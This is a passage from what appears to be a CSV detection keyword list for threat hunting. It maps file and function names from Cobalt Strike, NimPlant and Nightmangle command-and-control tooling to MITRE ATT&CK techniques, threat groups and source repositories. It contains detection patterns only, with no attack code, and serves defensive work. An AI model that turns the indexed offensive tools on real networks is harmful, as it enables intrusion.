T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_test.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_top *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_top_callback*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*BeaconApi.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for 
Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*beacon-c2-go*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" +"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconConsoleWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*beacongrapher.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconJob.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconJobWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*beaconlogs.json*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*beaconlogtracker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*BeaconNote.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
